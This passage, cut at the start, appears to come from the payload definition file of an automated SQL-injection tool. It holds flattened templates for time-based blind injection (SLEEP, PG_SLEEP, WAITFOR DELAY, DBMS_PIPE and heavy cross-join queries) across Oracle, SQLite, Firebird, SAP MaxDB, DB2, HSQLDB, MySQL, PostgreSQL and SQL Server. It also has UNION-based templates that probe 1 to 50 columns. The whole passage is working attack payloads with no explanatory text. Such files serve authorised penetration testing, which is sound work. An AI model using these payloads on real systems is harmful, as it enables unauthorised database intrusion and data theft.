DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;OracleOracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)5311,33(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)OracleOracle time-based blind - Parameter replace (heavy queries)5421,33(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)OracleSQLite > 2.0 time-based blind - Parameter replace (heavy query)5421,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))SQLite> 2.0Firebird time-based blind - Parameter replace (heavy query)5521,2,33IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)Firebird>= 2.0SAP MaxDB time-based blind - Parameter replace (heavy query)5521,33(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)SAP MaxDBIBM DB2 time-based blind - Parameter replace (heavy query)5521,2,33(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)IBM DB2HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)5421,2,31(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)HSQLDB>= 1.7.2HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)5521,2,31(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))HSQLDB> 2.0MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses5312,31,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))MySQL>= 5.0.11MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)5422,31,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLPostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses5312,31,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))PostgreSQL> 8.1PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)5422,31,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))PostgreSQLMicrosoft SQL Server/Sybase time-based blind - ORDER BY clauses5312,31,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerSybaseWindowsMicrosoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)5422,31,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerSybaseWindowsOracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)5302,31,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;),(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)OracleOracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)5312,31,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)OracleOracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)5422,31,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)OracleHSQLDB >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)5422,31,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)--HSQLDB>= 1.7.2HSQLDB > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)5422,31,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))HSQLDB> 2.0MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)3111,2,3,4,51[UNION]#[CHAR][COLSTART]-[COLSTOP]MySQLMySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)3111,2,3,4,51[UNION]#NULL[COLSTART]-[COLSTOP]MySQLMySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)3311,2,3,4,51[UNION]#[RANDNUM][COLSTART]-[COLSTOP]MySQLMySQL UNION query ([CHAR]) - 1 to 10 columns3111,2,3,4,51[UNION]#[CHAR]1-10MySQLMySQL UNION query (NULL) - 1 to 10 columns3111,2,3,4,51[UNION]#NULL1-10MySQLMySQL UNION query ([RANDNUM]) - 1 to 10 columns3311,2,3,4,51[UNION]#[RANDNUM]1-10MySQLMySQL UNION query ([CHAR]) - 11 to 20 columns3211,2,3,4,51[UNION]#[CHAR]11-20MySQLMySQL UNION query (NULL) - 11 to 20 columns3211,2,3,4,51[UNION]#NULL11-20MySQLMySQL UNION query ([RANDNUM]) - 11 to 20 columns3311,2,3,4,51[UNION]#[RANDNUM]11-20MySQLMySQL UNION query ([CHAR]) - 21 to 30 columns3311,2,3,4,51[UNION]#[CHAR]21-30MySQLMySQL UNION query (NULL) - 21 to 30 columns3311,2,3,4,51[UNION]#NULL21-30MySQLMySQL UNION query ([RANDNUM]) - 21 to 30 columns3411,2,3,4,51[UNION]#[RANDNUM]21-30MySQLMySQL UNION query ([CHAR]) - 31 to 40 columns3411,2,3,4,51[UNION]#[CHAR]31-40MySQLMySQL UNION query (NULL) - 31 to 40 columns3411,2,3,4,51[UNION]#NULL31-40MySQLMySQL UNION query ([RANDNUM]) - 31 to 40 columns3511,2,3,4,51[UNION]#[RANDNUM]31-40MySQLMySQL UNION query ([CHAR]) - 41 to 50 columns3511,2,3,4,51[UNION]#[CHAR]41-50MySQLMySQL UNION query (NULL) - 41 to 50 columns3511,2,3,4,51[UNION]#NULL41-50MySQLMySQL UNION query ([RANDNUM]) - 41 to 50 columns3511,2,3,4,51[UNION]#[RANDNUM]41-50MySQLGeneric UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)3111,2,3,4,51[UNION]-- [CHAR][COLSTART]-[COLSTOP]Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)3111,2,3,4,51[UNION]-- NULL[COLSTART]-[COLSTOP]Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)3311,2,3,4,51[UNION]-- [RANDNUM][COLSTART]-[COLSTOP]Generic UNION query ([CHAR]) - 1 to 10 columns3111,2,3,4,51[UNION]-- [CHAR]1-10Generic UNION query (NULL) - 1 to 10 columns3111,2,3,4,51[UNION]-- NULL1-10Generic UNION query ([RANDNUM]) - 1 to 10 columns3311,2,3,4,51[UNION]-- [RANDNUM]1-10Generic UNION query ([CHAR]) - 11 to 20 columns3211,2,3,4,51[UNION]-- [CHAR]11-20Generic UNION query (NULL) - 11 to 20 columns3211,2,3,4,51[UNION]-- NULL11-20Generic UNION query ([RANDNUM]) - 11 to 20 columns3311,2,3,4,51[UNION]-- [RANDNUM]11-20Generic UNION query ([CHAR]) - 21 to 30 columns3311,2,3,4,51[UNION]-- [CHAR]21-30Generic UNION query (NULL) - 21 to 30 columns3311,2,3,4,51[UNION]-- NULL21-30Generic UNION query ([RANDNUM]) - 21 to 30 columns3411,2,3,4,51[UNION]-- [RANDNUM]21-30Generic UNION query ([CHAR]) - 31 to 40 columns3411,2,3,4,51[UNION]-- [CHAR]31-40Generic UNION query (NULL) - 31 to 40 columns3411,2,3,4,51[UNION]-- NULL31-40Generic UNION query ([RANDNUM]) - 31 to 40 columns3511,2,3,4,51[UNION]-- [RANDNUM]31-40Generic UNION query ([CHAR]) - 41 to 50 columns3511,2,3,4,51[UNION]-- [CHAR]41-50Generic UNION query (NULL) - 41 to 50 columns3511,2,3,4,51[UNION]-- NULL41-50Generic UNION query ([RANDNUM]) - 41 to 50 columns3511,2,3,4,51[UNION]-- [RANDNUM]41-50